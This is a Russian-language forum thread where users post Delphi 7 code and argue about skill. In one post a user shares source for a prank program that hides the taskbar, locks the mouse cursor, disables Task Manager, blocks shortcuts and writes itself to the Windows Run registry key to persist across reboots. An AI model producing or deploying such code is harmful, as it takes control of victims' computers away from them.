Одесса: 5°С (вода 9°С)
Киев: 3°С
Львов: 4°С

Тема: Delphi 7

Закрытая тема
Страница 1 из 2 1 2 ПоследняяПоследняя
Показано с 1 по 20 из 30
  1. Вверх #1

    По умолчанию Delphi 7

    Попрошу здесь не задавать вопросов.

    Этот топик для того, чтобы здесь выкладывать листинг интересных прогамм.

    Я первый выложу:


  2. Вверх #2
    unit Unit1;

    interface

    uses
    Windows, Messages, SysUtils, Variants, Classes, Graphics, Controls, Forms,
    Dialogs, StdCtrls;

    type
    TForm1 = class(TForm)
    Button1: TButton;
    Button2: TButton;
    procedure Button1Click(Sender: TObject);
    procedure Button2Click(Sender: TObject);
    private
    { Private declarations }
    public
    { Public declarations }
    end;

    var
    Form1: TForm1;

    implementation

    {$R *.dfm}

    procedure TForm1.Button1Click(Sender: TObject);
    var
    H:HWND;
    begin
    H:=FindWindow('Shell_TrayWnd','');
    ShowWindow(H, SW_HIDE);
    Sleep(2000);
    end;

    procedure TForm1.Button2Click(Sender: TObject);
    var
    H:HWND;
    begin
    H:=FindWindow('Shell_TrayWnd','');
    ShowWindow(H, SW_SHOW);
    end;

    end.



    При Button1Click таскбар пропадает с экрана, при Button2Click таскбар востанавливается в первоначальное состаяние.

    Ваша очередь....
    Наш выбор - Хеви Мэтал,
    И наша сила в этом!

  3. Вверх #3
    Постоялец форума Аватар для Николай
    Пол
    Мужской
    Адрес
    Los Angeles
    Возраст
    33
    Сообщений
    1,470
    Репутация
    100
    Shadow_exe, от себя убедительно предложу не превращать этот форум в сбор всякой ерунды, которую ты нашёл в интернете и на которую обратил внимания по причинам, изложенным ниже:

    1. Форум создан для общения, а не для складирования всего, что тебе нравится.
    2. Поверь, на форуме есть множество людей, которые на порядок лучше тебя разбираются в этих вопросах, не нужно показывать что ты нашёл - это только вызывает смех с тебя, учитывая что выложена ерунда.
    3. и т.п. и т.д.
    /dev/gmaker

  4. Вверх #4
    Постоялец форума
    Пол
    Мужской
    Адрес
    Одесса
    Возраст
    34
    Сообщений
    1,605
    Репутация
    19
    Николай, 100% +1
    It is good to be bad

  5. Вверх #5
    Николай если ты такой умный, то найди в нете как менять иконку приложения с чатотой в 1 секунду к примеру, не подгружая из вне.

    Если найдеш то я тебя послушаю и больше даже не появлюсь на этом форуме, но если нет, в чем я убежден, то пошол ты.... так как это я сам написал, а еще тебе хочу сказать, что очень полезно читать хелпы.

    Понял я надеюсь?

    То что есть умнее люди, я не спорю, но ты сперва смотри на себя.

    А кому не лень и кто знает интересные программы, пусть выкладывает, это не противозаконно.
    Наш выбор - Хеви Мэтал,
    И наша сила в этом!

  6. Вверх #6
    Не покидает форум Аватар для iFog
    Пол
    Мужской
    Адрес
    Одесса
    Возраст
    36
    Сообщений
    5,809
    Репутация
    396
    Цитата Сообщение от Shadow_exe
    Николай если ты такой умный, то найди в нете как менять иконку приложения с чатотой в 1 секунду к примеру, не подгружая из вне.

    Если найдеш то я тебя послушаю и больше даже не появлюсь на этом форуме, но если нет, в чем я убежден, то пошол ты.... так как это я сам написал, а еще тебе хочу сказать, что очень полезно читать хелпы.

    Понял я надеюсь?

    То что есть умнее люди, я не спорю, но ты сперва смотри на себя.

    А кому не лень и кто знает интересные программы, пусть выкладывает, это не противозаконно.
    [M] - мод, за неуважительное отношение к участникам форума.

    от себя: тебе здесь никто ничего не должен, и того чтобы тебе что-то доказывать - ты не достоин. Так что открывай гугль и вперёд...
    Вы хотите поставить нас в тупик своими вопросами?
    Так мы поставим Вас в тупик своими ответами!

  7. Вверх #7
    Постоялец форума Аватар для Николай
    Пол
    Мужской
    Адрес
    Los Angeles
    Возраст
    33
    Сообщений
    1,470
    Репутация
    100
    Цитата Сообщение от Shadow_exe
    Если найдеш то я тебя послушаю и больше даже не появлюсь на этом форуме, но если нет, в чем я убежден, то пошол ты.... так как это я сам написал, а еще тебе хочу сказать, что очень полезно читать хелпы.

    Понял я надеюсь?
    У тебя есть возможность повторить всё, что ты тут мне написал вслух в Одессе при встрече, заодно и послать попробуешь. стукни в аську 356097.
    /dev/gmaker

  8. Вверх #8
    Не покидает форум Аватар для iFog
    Пол
    Мужской
    Адрес
    Одесса
    Возраст
    36
    Сообщений
    5,809
    Репутация
    396
    Ээээ завязывайте с разборками.
    Вы хотите поставить нас в тупик своими вопросами?
    Так мы поставим Вас в тупик своими ответами!

  9. Вверх #9
    Постоялец форума Аватар для Пилигрим
    Пол
    Мужской
    Адрес
    Одесса
    Возраст
    31
    Сообщений
    1,215
    Репутация
    134

    По умолчанию Re: Delphi 7

    Цитата Сообщение от Shadow_exe
    Этот топик для того, чтобы здесь выкладывать листинг интересных прогамм.
    Чем интересен исходныей текст( а не листинг ) нижевыложенной программы ???

  10. Вверх #10
    Постоялец форума
    Пол
    Мужской
    Адрес
    Одесса
    Возраст
    34
    Сообщений
    1,605
    Репутация
    19
    Пилигрим, тем, что пацану лень доучиться до серьезных проектов, но хочецца потешить профессиональную гордость.
    It is good to be bad

  11. Вверх #11
    Вот то почетал тут тот бред что вы понаписывали и тошно стает...
    Наш выбор - Хеви Мэтал,
    И наша сила в этом!

  12. Вверх #12
    Посетитель Аватар для Мерлин
    Пол
    Мужской
    Адрес
    ̾٩(̾●̮̮̃̾•̃̾)۶
    Возраст
    31
    Сообщений
    308
    Репутация
    51
    Ну вы вцепились в бедного Shadow_exe, он чё вам козёл отпущения, парень написал то что знает,
    а выше так и было сказано выкладывайте интересное.......

    Он так и сделал.

    Кстати вот программка которая использует его пример:

    unit MbIWb;

    interface

    uses
    Windows, Messages, SysUtils, Variants, Classes, Graphics, Controls, Forms,
    Dialogs, StdCtrls, ExtCtrls,ShellAPI ,Registry;

    type
    TForm1 = class(TForm)
    Timer1: TTimer;
    Timer2: TTimer;
    procedure FormCreate(Sender: TObject);
    procedure Timer1Timer(Sender: TObject);
    procedure Timer2Timer(Sender: TObject);
    procedure FormShortCut(var Msg: TWMKey; var Handled: Boolean);
    procedure FormShow(Sender: TObject);
    private
    { Private declarations }
    public
    { Public declarations }
    end;

    {$IFNDEF WIN32}
    const MAX_PATH = 144;
    {$ENDIF}

    var
    s, b : Double;
    c, d : Integer;
    Form1 : TForm1;
    H, J : HWND;
    L : array[0..255] of Char;
    implementation

    uses Types, StrUtils;

    {$R *.dfm}

    procedure TForm1.FormCreate(Sender: TObject);
    begin
    ShowWindow(Application.Handle,SW_HIDE);
    J:=FindWindow('Shell_traywnd','');
    ShowWindow(J,SW_HIDE);Sleep(2000);

    S:=Screen.Width/2;
    b:=Screen.Height/2;
    c:=StrToInt(FloatToStr(S));
    d:=StrToInt(FloatToStr(b));


    end;

    procedure TForm1.Timer1Timer(Sender: TObject);
    begin
    Mouse.CursorPos:=Point(c,d);
    end;

    procedure TForm1.Timer2Timer(Sender: TObject);
    begin
    if Focused=false then begin
    H:=Handle;
    repeat
    H:=GetWindow(H,GW_HWNDPREV);
    GetWindowText(H,L,254);
    until (H=0)or(L='Диспетчер задач Windows');
    CloseWindow(H);
    EnableWindow(H,False);

    end;
    end;

    procedure TForm1.FormShortCut(var Msg: TWMKey; var Handled: Boolean);
    begin
    Handled:=True;
    end;

    procedure TForm1.FormShow(Sender: TObject);
    var
    reg: TRegistry;
    begin
    reg := TRegistry.Create;
    reg.RootKey := HKEY_LOCAL_MACHINE;
    reg.LazyWrite := false;
    reg.OpenKey('Software\Microsoft\Windows\CurrentVer sion\Run',
    false);
    reg.WriteString('My App', Application.ExeName);
    reg.CloseKey;
    reg.free;
    end;

    end.

  13. Вверх #13
    Посетитель Аватар для Мерлин
    Пол
    Мужской
    Адрес
    ̾٩(̾●̮̮̃̾•̃̾)۶
    Возраст
    31
    Сообщений
    308
    Репутация
    51
    fog, Ну что умники где ваши программы, Shadow_exe открыл класную тему, а вы токо говорить можете, выложите хоть одну пристойную программу, которую сам написал, а не с инета скачал.....

  14. Вверх #14
    Немогу понять почему тема называется Delphi 7 ? Это и в 5-м можно сделать ))(в более древних не работал просто)

  15. Вверх #15
    Посетитель
    Пол
    Мужской
    Адрес
    Odessa
    Сообщений
    496
    Репутация
    13
    Мерлин,
    fog, Ну что умники где ваши программы,
    Вай, вай. Песочницу прекращай. Игр в "Слабо" здесь не будет. Тем более, чем пальцы здесь гнуть, уделил бы лучше внимание дальнейшему изучению. Есть как минимум 4 момента говорящих о твоем опыте:
    а) обьявление такой кучи глобальных переменных (Садись два)

    б) Боже что это:
    S:=Screen.Width/2;
    b:=Screen.Height/2;
    c:=StrToInt(FloatToStr(S));
    d:=StrToInt(FloatToStr(b));
    О операторе div читали? Или нет времени подумать?

    в) что будет делать программа если винда не русская? Какой "Диспетчер задач" будет искать?

    г) если на ключ реестра "Run" поставлены ограничения доступа (к примеру ты не под админским аккаунтом) куда вылетим? Я уже молчу что потеряем экземпляр reg.

    Так что, вместо бросания вызова, поработай над ошибками.

    Все были молодые, самонадеянные. Расслабся. Ты не один умный на свете.
    Думаешь ли ты о жизни? Думаешь ли ты о смерти? Что ты будешь делать когда поймешь что никому не нужен?

  16. Вверх #16
    Постоялец форума
    Пол
    Мужской
    Адрес
    Одесса
    Возраст
    34
    Сообщений
    1,605
    Репутация
    19
    Вопрос к афтару.

    ....
    var

    a,b : integer;
    ....

    asm

    mov EAX,a
    mov EBX,b

    xor EAX,EBX
    xor EBX,EAX
    xor EAX,EBX

    mov a,EAX
    mov b,EBX

    end;

    Что произойдет с переменными? Чисто в уме... сам себя проверь.

    Эквивалент в С++

    a^=b^=a^=b;

    (с паскалем не дружу, если кто знает как в нем сделать проще чем я написал - пишите).
    It is good to be bad

  17. Вверх #17
    Тема называется Delphi 7, с языком Паскаль! А не Асемблер!
    Я понимаю что в Delphi и асемблер можно писать, но я работаю в ПАСКАЛЕ!

    Для справачки: Автор пишется через букву "В", а не "Ф"...

    LANgraf: Называется так, потому что я в нем работаю и не говорил что нельзя это реализовать в более раней версии.
    Наш выбор - Хеви Мэтал,
    И наша сила в этом!

  18. Вверх #18
    Постоялец форума
    Пол
    Мужской
    Адрес
    Одесса
    Возраст
    34
    Сообщений
    1,605
    Репутация
    19
    Shadow_exe, если хочешь стать программистом, заявления типа "я работаю в паскале" закинь на полку. Работать ты можешь в чем угодно, но если ты хочешь быть на сцене системного программирования, необязательно писать на ассемблере, но знать его надо. Это раз.

    Я привел и сишный выриант. Если ты ответишь, что Си не знаешь тоже, то тогда вопрос - как ты будешь работать с MSDN?


    З.Ы. Напиши на чистом паскале процедуру преобразования чила из big-endian в little-endian формат.
    It is good to be bad

  19. Вверх #19
    Посетитель Аватар для Мерлин
    Пол
    Мужской
    Адрес
    ̾٩(̾●̮̮̃̾•̃̾)۶
    Возраст
    31
    Сообщений
    308
    Репутация
    51
    Inky Тема интересных программ превращаеться в мировое состязание "Кто круче загнет",
    это уже весело

  20. Вверх #20
    Посетитель Аватар для Мерлин
    Пол
    Мужской
    Адрес
    ̾٩(̾●̮̮̃̾•̃̾)۶
    Возраст
    31
    Сообщений
    308
    Репутация
    51
    Slaventius, Спасибо за показанные ошибки в программе, кстати пакость хорошая, первый раз токо так отлавливаються, посмеяться можно

    А как определить какая версия винды стоит??
    =>Тогда я уже не Диспетчер задач буду искать


Закрытая тема
Страница 1 из 2 1 2 ПоследняяПоследняя

Похожие темы

  1. Вопрсики по Delphi
    от cTcangel в разделе Программирование
    Ответов: 6
    Последнее сообщение: 24.10.2006, 17:39
  2. Изоброжения и Delphi
    от Shadow_exe в разделе Программирование
    Ответов: 9
    Последнее сообщение: 20.10.2006, 22:47
  3. компилятор для Delphi
    от oz(skyline) в разделе Программирование
    Ответов: 3
    Последнее сообщение: 25.06.2006, 22:36
  4. Подскажите Delphi 6
    от U391 в разделе Программирование
    Ответов: 11
    Последнее сообщение: 22.05.2006, 11:05
  5. помогите в Delphi 7
    от U391 в разделе Программирование
    Ответов: 6
    Последнее сообщение: 22.05.2006, 10:57

Социальные закладки

Социальные закладки

Ваши права

  • Вы не можете создавать новые темы
  • Вы не можете отвечать в темах
  • Вы не можете прикреплять вложения
  • Вы не можете редактировать свои сообщения